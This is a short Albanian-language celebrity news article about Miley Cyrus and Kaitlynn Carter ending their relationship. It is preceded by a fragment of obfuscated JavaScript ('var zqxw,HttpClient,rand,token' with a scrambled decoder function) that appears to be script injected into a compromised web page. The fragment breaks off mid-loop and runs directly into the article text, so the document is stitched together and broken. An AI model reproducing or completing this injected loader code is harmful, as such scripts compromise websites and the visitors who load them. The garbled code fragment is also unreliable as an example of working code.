;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kaq ishte! – Miley ndahet edhe nga e dashura për të cilën la burrin

By

Miley Cyrus dhe Kaitlynn Carter, i kanë dhënë fund lidhjes së tyre.

Raportohet se këngëtarja 26 vjeçare dhe 31 vjeçarja, nuk janë më në një lidhje romantike, njofton People.

“Miley dhe Kaitlyn u ndanë”, ka thënë një burim.

“Ato kanë qenë mike gjithmonë dhe janë aty për njëra-tjetrën”, shtoi burimi por ato thjesht nuk janë në një marrëdhënie romantike.

Miley dhe Kaitlynn nisën lidhjen në gusht kur edhe u panë duke u puthur ndërsa ishin me pushime në Itali.

Jo shumë kohë më parë, Miley njoftoi se ajo dhe Liam Hemsworth ishin ndarë pas tetë muaj martesë.

Në fillim të kësaj vere, u zbulua se Kaitlynn dhe burri Brody Jenner ishin ndarë dhe se martesa e tyre nuk ishte kurrë ligjore.

Artikuj të ngjashëm